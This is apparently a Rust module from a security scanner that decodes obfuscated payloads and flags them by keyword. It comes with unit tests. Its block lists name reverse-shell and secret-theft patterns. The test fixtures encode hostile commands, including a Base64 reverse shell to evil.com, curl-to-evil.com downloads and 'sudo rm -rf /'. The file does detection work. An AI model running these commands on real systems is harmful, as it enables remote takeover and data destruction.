use base64::Engine;
use rayon::prelude::*;
use regex::Regex;
use std::sync::LazyLock;
/// Stateless detector for encoded (Base64, hex, URL, `\u` escape and
/// `String.fromCharCode`) payloads hidden inside text.
///
/// The type carries no data, so it is cheap to copy and can be freely shared.
#[derive(Debug, Clone, Copy)]
pub struct Deobfuscator;
/// Matches Base64 candidates: at least four 4-character groups from the
/// standard alphabet (16+ characters), optionally followed by one padded
/// final group (`xx==` or `xxx=`).
static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let pattern = r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?";
    Regex::new(pattern).expect("BASE64 regex")
});
/// Matches four or more consecutive `\xNN` escapes, or four or more
/// consecutive `0xNN` literals (the two forms are never mixed in one match).
static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let pattern = r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}";
    Regex::new(pattern).expect("HEX regex")
});
/// Matches four or more consecutive percent-encoded bytes (`%NN`).
static URL_ENCODED_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let pattern = r"(?:%[0-9A-Fa-f]{2}){4,}";
    Regex::new(pattern).expect("URL encoded regex")
});
/// Matches two or more consecutive `\uNNNN` escapes (four hex digits each).
static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let pattern = r"(?:\\u[0-9A-Fa-f]{4}){2,}";
    Regex::new(pattern).expect("Unicode escape regex")
});
/// Matches a `String.fromCharCode(...)` call whose argument list consists
/// only of digits, commas and whitespace.
static CHAR_CODE_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let pattern = r"String\.fromCharCode\s*\([\d,\s]+\)";
    Regex::new(pattern).expect("CharCode regex")
});
impl Deobfuscator {
pub fn new() -> Self {
Self
}
pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
if !self.has_encoded_patterns(content) {
return Vec::new();
}
vec![
self.decode_base64(content),
self.decode_hex(content),
self.decode_url(content),
self.decode_unicode_escapes(content),
self.decode_char_code(content),
]
.into_par_iter()
.flatten()
.collect()
}
fn has_encoded_patterns(&self, content: &str) -> bool {
BASE64_PATTERN.is_match(content)
|| HEX_PATTERN.is_match(content)
|| URL_ENCODED_PATTERN.is_match(content)
|| UNICODE_ESCAPE_PATTERN.is_match(content)
|| CHAR_CODE_PATTERN.is_match(content)
}
fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in BASE64_PATTERN.find_iter(content) {
let encoded = cap.as_str();
if encoded.len() < 20 {
continue;
}
if let Ok(decoded_bytes) = base64::engine::general_purpose::STANDARD.decode(encoded)
&& let Ok(decoded_str) = String::from_utf8(decoded_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "base64".to_string(),
});
}
}
results
}
fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in HEX_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
encoded
.split("\\x")
.filter(|s| !s.is_empty())
.filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
.collect()
} else {
encoded
.split("0x")
.filter(|s| !s.is_empty())
.filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
.collect()
};
if let Ok(decoded_str) = String::from_utf8(hex_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "hex".to_string(),
});
}
}
results
}
fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in URL_ENCODED_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let mut decoded_bytes = Vec::new();
let mut chars = encoded.chars().peekable();
while let Some(c) = chars.next() {
if c == '%' {
let hex: String = chars.by_ref().take(2).collect();
if let Ok(byte) = u8::from_str_radix(&hex, 16) {
decoded_bytes.push(byte);
}
} else {
decoded_bytes.push(c as u8);
}
}
if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "url".to_string(),
});
}
}
results
}
fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let mut decoded = String::new();
let mut chars = encoded.chars().peekable();
while let Some(c) = chars.next() {
if c == '\\' && chars.peek() == Some(&'u') {
chars.next(); let hex: String = chars.by_ref().take(4).collect();
if let Ok(code_point) = u32::from_str_radix(&hex, 16)
&& let Some(ch) = char::from_u32(code_point)
{
decoded.push(ch);
}
} else {
decoded.push(c);
}
}
if self.is_suspicious(&decoded) {
results.push(DecodedContent {
original: encoded.to_string(),
decoded,
encoding: "unicode".to_string(),
});
}
}
results
}
fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in CHAR_CODE_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let numbers: Vec<u32> = encoded
.split(|c: char| !c.is_ascii_digit())
.filter(|s| !s.is_empty())
.filter_map(|s| s.parse().ok())
.collect();
let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
if self.is_suspicious(&decoded) {
results.push(DecodedContent {
original: encoded.to_string(),
decoded,
encoding: "charcode".to_string(),
});
}
}
results
}
fn is_suspicious(&self, content: &str) -> bool {
let suspicious_patterns = [
"eval",
"exec",
"bash",
"sh -c",
"/bin/",
"curl ",
"wget ",
"nc ",
"netcat",
"/dev/tcp",
"/dev/udp",
"base64 -d",
"python -c",
"ruby -e",
"perl -e",
"powershell",
"cmd.exe",
"rm -rf",
"chmod ",
"sudo ",
"password",
"secret",
"api_key",
"token",
"credential",
"http://",
"https://",
"ftp://",
];
let content_lower = content.to_lowercase();
suspicious_patterns
.iter()
.any(|p| content_lower.contains(p))
}
pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
use crate::engine::scanner::ScannerConfig;
let mut findings = Vec::new();
let config = ScannerConfig::new();
findings.extend(config.check_content(content, file_path));
for decoded in self.deobfuscate(content) {
let context = format!("{}:decoded:{}", file_path, decoded.encoding);
for mut finding in config.check_content(&decoded.decoded, &context) {
finding.message = format!(
"{} [Decoded from {} encoded content]",
finding.message, decoded.encoding
);
findings.push(finding);
}
if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
findings.push(crate::rules::Finding {
id: "OB-DEEP-001".to_string(),
severity: crate::rules::Severity::High,
category: crate::rules::Category::Obfuscation,
confidence: crate::rules::Confidence::Firm,
name: "Obfuscated suspicious content".to_string(),
location: crate::rules::Location {
file: file_path.to_string(),
line: 0,
column: None,
},
code: decoded.original.chars().take(100).collect::<String>() + "...",
message: format!(
"Found {} encoded content that decodes to suspicious payload",
decoded.encoding
),
recommendation: "Review the decoded content for malicious commands or URLs"
.to_string(),
fix_hint: None,
cwe_ids: vec!["CWE-116".to_string()],
rule_severity: None,
client: None,
context: None,
});
}
}
findings
}
fn is_highly_suspicious(&self, content: &str) -> bool {
let highly_suspicious = [
"bash -i",
"/dev/tcp/",
"nc -e",
"rm -rf /",
"curl | bash",
"wget | sh",
"eval(base64",
"exec(decode",
];
let content_lower = content.to_lowercase();
highly_suspicious.iter().any(|p| content_lower.contains(p))
}
}
impl Default for Deobfuscator {
fn default() -> Self {
Self::new()
}
}
/// One encoded span together with its decoded form.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct DecodedContent {
    /// The encoded text exactly as it was matched in the scanned content.
    pub original: String,
    /// The text obtained by decoding `original`.
    pub decoded: String,
    /// Name of the encoding that was recognised
    /// (`"base64"`, `"hex"`, `"url"`, `"unicode"` or `"charcode"`).
    pub encoding: String,
}
// Unit tests for the individual decoders, the keyword heuristics,
// `deobfuscate` and `deep_scan`.
#[cfg(test)]
mod tests {
use super::*;
// A Base64 payload whose decoded text contains "curl" is reported.
#[test]
fn test_decode_base64() {
let deob = Deobfuscator::new();
let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
let results = deob.decode_base64(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
// A run of `\xNN` escapes whose decoded text contains "curl" is reported.
#[test]
fn test_decode_hex() {
let deob = Deobfuscator::new();
let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
let results = deob.decode_hex(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
// A run of `%NN` bytes whose decoded text contains "curl" is reported.
#[test]
fn test_decode_url() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70";
let results = deob.decode_url(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
// `String.fromCharCode` arguments spelling "eval" are reported.
#[test]
fn test_decode_charcode() {
let deob = Deobfuscator::new();
let content = "String.fromCharCode(101,118,97,108)";
let results = deob.decode_char_code(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("eval"));
}
// Keyword heuristic: three suspicious samples and one harmless sample.
#[test]
fn test_is_suspicious() {
let deob = Deobfuscator::new();
assert!(deob.is_suspicious("curl http://example.com"));
assert!(deob.is_suspicious("bash -c 'evil command'"));
assert!(deob.is_suspicious("password=secret123"));
assert!(!deob.is_suspicious("hello world"));
}
// `deep_scan` must yield either an OB-DEEP-001 finding or a finding whose
// message mentions "Decoded" for a Base64 payload embedded in a script.
#[test]
fn test_deep_scan() {
let deob = Deobfuscator::new();
let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
let findings = deob.deep_scan(content, "test.sh");
assert!(
findings
.iter()
.any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
);
}
// Plain text without any encoded span produces no results.
#[test]
fn test_deobfuscate_empty() {
let deob = Deobfuscator::new();
let results = deob.deobfuscate("normal text without obfuscation");
assert!(results.is_empty());
}
// NOTE(review): despite the name, this builds the unit struct directly and
// does not go through `Default`; `test_deobfuscator_default` covers that.
#[test]
fn test_default_trait() {
let deob = Deobfuscator;
assert!(!deob.is_suspicious("hello"));
}
// `\uNNNN` escapes spelling "eval" are reported.
#[test]
fn test_decode_unicode_escapes() {
let deob = Deobfuscator::new();
let content = r"\u0065\u0076\u0061\u006c";
let results = deob.decode_unicode_escapes(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("eval"));
}
// An 8-character Base64 string is too short to be considered.
#[test]
fn test_decode_base64_short_string() {
let deob = Deobfuscator::new();
let content = "YWJjZA=="; let results = deob.decode_base64(content);
assert!(results.is_empty());
}
// A long-enough Base64 string that is expected to produce no result.
#[test]
fn test_decode_base64_non_suspicious() {
let deob = Deobfuscator::new();
let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; let results = deob.decode_base64(content);
assert!(results.is_empty());
}
// The `0xNN` notation is decoded as well as `\xNN`.
#[test]
fn test_decode_hex_0x_format() {
let deob = Deobfuscator::new();
let content = "0x630x750x720x6c0x200x680x740x740x70";
let results = deob.decode_hex(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
// Each highly-suspicious keyword is matched; harmless text is not.
#[test]
fn test_is_highly_suspicious() {
let deob = Deobfuscator::new();
assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
assert!(deob.is_highly_suspicious("rm -rf /"));
assert!(deob.is_highly_suspicious("curl | bash something"));
assert!(deob.is_highly_suspicious("wget | sh something"));
assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
assert!(deob.is_highly_suspicious("eval(base64"));
assert!(deob.is_highly_suspicious("exec(decode"));
assert!(!deob.is_highly_suspicious("echo hello"));
}
// `deobfuscate` reports a Base64 payload that follows a `key=` prefix.
#[test]
fn test_deobfuscate_with_base64() {
let deob = Deobfuscator::new();
let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
// Content mixing Base64 and `\xNN` spans yields at least one result.
#[test]
fn test_deobfuscate_multiple_encodings() {
let deob = Deobfuscator::new();
let content =
r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
// Clean content is expected to produce no findings at all.
#[test]
fn test_deep_scan_clean_content() {
let deob = Deobfuscator::new();
let content = "normal clean content without any issues";
let findings = deob.deep_scan(content, "test.txt");
assert!(findings.is_empty());
}
// Only checks that `deep_scan` completes; the findings are discarded.
#[test]
fn test_deep_scan_with_suspicious_decoded() {
let deob = Deobfuscator::new();
let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; let findings = deob.deep_scan(content, "test.sh");
let _ = findings;
}
// `DecodedContent` implements `Debug` and prints its type name and fields.
#[test]
fn test_decoded_content_debug_trait() {
let content = DecodedContent {
original: "abc".to_string(),
decoded: "xyz".to_string(),
encoding: "base64".to_string(),
};
let debug_str = format!("{:?}", content);
assert!(debug_str.contains("DecodedContent"));
assert!(debug_str.contains("abc"));
}
// `DecodedContent::clone` copies all three fields.
#[test]
fn test_decoded_content_clone_trait() {
let content = DecodedContent {
original: "abc".to_string(),
decoded: "xyz".to_string(),
encoding: "base64".to_string(),
};
let cloned = content.clone();
assert_eq!(content.original, cloned.original);
assert_eq!(content.decoded, cloned.decoded);
assert_eq!(content.encoding, cloned.encoding);
}
// One positive sample for most of the remaining suspicious keywords.
#[test]
fn test_is_suspicious_various_patterns() {
let deob = Deobfuscator::new();
assert!(deob.is_suspicious("wget http://evil.com"));
assert!(deob.is_suspicious("nc -l 1234"));
assert!(deob.is_suspicious("netcat connection"));
assert!(deob.is_suspicious("/dev/tcp/evil"));
assert!(deob.is_suspicious("/dev/udp/evil"));
assert!(deob.is_suspicious("base64 -d | bash"));
assert!(deob.is_suspicious("python -c 'import os'"));
assert!(deob.is_suspicious("ruby -e 'exec'"));
assert!(deob.is_suspicious("perl -e 'system'"));
assert!(deob.is_suspicious("powershell.exe"));
assert!(deob.is_suspicious("cmd.exe /c"));
assert!(deob.is_suspicious("rm -rf /tmp"));
assert!(deob.is_suspicious("chmod 777 file"));
assert!(deob.is_suspicious("sudo rm"));
assert!(deob.is_suspicious("api_key=secret"));
assert!(deob.is_suspicious("token=abc123"));
assert!(deob.is_suspicious("credential_store"));
assert!(deob.is_suspicious("ftp://server"));
}
// Percent-encoded text that is expected to decode to something harmless.
#[test]
fn test_decode_url_non_suspicious() {
let deob = Deobfuscator::new();
let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
let results = deob.decode_url(content);
assert!(results.is_empty());
}
// `\xNN` text that is expected to decode to something harmless.
#[test]
fn test_decode_hex_non_suspicious() {
let deob = Deobfuscator::new();
let content = r"\x68\x65\x6c\x6c\x6f";
let results = deob.decode_hex(content);
assert!(results.is_empty());
}
// `String.fromCharCode` arguments that are expected to decode to something harmless.
#[test]
fn test_decode_charcode_non_suspicious() {
let deob = Deobfuscator::new();
let content = "String.fromCharCode(104,101,108,108,111)";
let results = deob.decode_char_code(content);
assert!(results.is_empty());
}
// Two `\uNNNN` escapes that are expected to decode to something harmless.
#[test]
fn test_decode_unicode_non_suspicious() {
let deob = Deobfuscator::new();
let content = r"\u0061\u0062";
let results = deob.decode_unicode_escapes(content);
assert!(results.is_empty());
}
// Unencoded dangerous content is expected to be flagged by the plain scan.
#[test]
fn test_deep_scan_original_content_finding() {
let deob = Deobfuscator::new();
let content = "sudo rm -rf /important/files";
let findings = deob.deep_scan(content, "script.sh");
assert!(!findings.is_empty());
}
// `deobfuscate` tags percent-encoded hits with the "url" encoding.
#[test]
fn test_deobfuscate_with_url_encoding() {
let deob = Deobfuscator::new();
let content = "command=%63%75%72%6c%20http://evil.com";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "url"));
}
// `deobfuscate` tags `\uNNNN` hits with the "unicode" encoding.
#[test]
fn test_deobfuscate_with_unicode_escapes() {
let deob = Deobfuscator::new();
let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "unicode"));
}
// `deobfuscate` tags `String.fromCharCode` hits with the "charcode" encoding.
#[test]
fn test_deobfuscate_with_charcode() {
let deob = Deobfuscator::new();
let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "charcode"));
}
// A fully percent-encoded input decodes to text containing "curl" and "http".
#[test]
fn test_url_decode_with_only_percent_encoded() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
let results = deob.decode_url(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
assert!(results[0].decoded.contains("http"));
}
// A longer run of `\uNNNN` escapes decodes to text containing "curl".
#[test]
fn test_unicode_decode_multiple_escapes() {
let deob = Deobfuscator::new();
let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
let results = deob.decode_unicode_escapes(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
// Content containing all five encodings yields at least one result.
#[test]
fn test_deobfuscate_all_encodings_combined() {
let deob = Deobfuscator::new();
let content = r#"
url=%63%75%72%6c%20http
unicode=\u0065\u0076\u0061\u006c
charcode=String.fromCharCode(99,117,114,108)
hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
"#;
let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
// NOTE(review): the final assertion also passes when any finding at all is
// present, so it does not require a decoded finding specifically.
#[test]
fn test_deep_scan_with_deobfuscated_rule_match() {
let deob = Deobfuscator::new();
let base64_content = "c3VkbyBybSAtcmYgLw==";
let content = format!("execute={}", base64_content);
let findings = deob.deep_scan(&content, "test.sh");
let has_decoded_finding = findings
.iter()
.any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
assert!(has_decoded_finding || !findings.is_empty());
}
// Only checks that `deobfuscate` completes; the results are discarded.
#[test]
fn test_url_decode_mixed_with_normal_chars() {
let deob = Deobfuscator::new();
let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
let results = deob.deobfuscate(content);
let _ = results; }
// Isolated single `\uNNNN` escapes: either nothing is reported or a
// "unicode" result is present.
#[test]
fn test_unicode_escape_mixed_chars() {
let deob = Deobfuscator::new();
let content = r"var x = '\u0063url \u0068ttp://evil.com'";
let results = deob.deobfuscate(content);
assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
}
// `\x` followed by a non-hex digit must not produce a "hex" result.
#[test]
fn test_decode_hex_invalid_format() {
let deob = Deobfuscator::new();
let content = "\\x6Gurl \\x7Gttp"; let results = deob.deobfuscate(content);
assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
}
// A `String.fromCharCode` call nested inside another call is still found.
#[test]
fn test_charcode_partial_match() {
let deob = Deobfuscator::new();
let content = "eval(String.fromCharCode(98,97,115,104))";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "charcode"));
}
// An instance obtained through `Default` behaves like one from `new`.
#[test]
fn test_deobfuscator_default() {
let deob: Deobfuscator = Default::default();
assert!(!deob.is_suspicious("normal text"));
assert!(deob.is_suspicious("curl http://evil.com"));
}
// NOTE(review): despite the name, the input here is purely percent-encoded.
#[test]
fn test_url_decode_mixed_with_plain_chars() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70"; let results = deob.decode_url(content);
assert!(!results.is_empty());
assert_eq!(results[0].encoding, "url");
}
// Same input and expectation as `test_decode_url_non_suspicious`.
#[test]
fn test_decode_url_hello_world_not_suspicious() {
let deob = Deobfuscator::new();
let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; let results = deob.decode_url(content);
assert!(results.is_empty());
}
}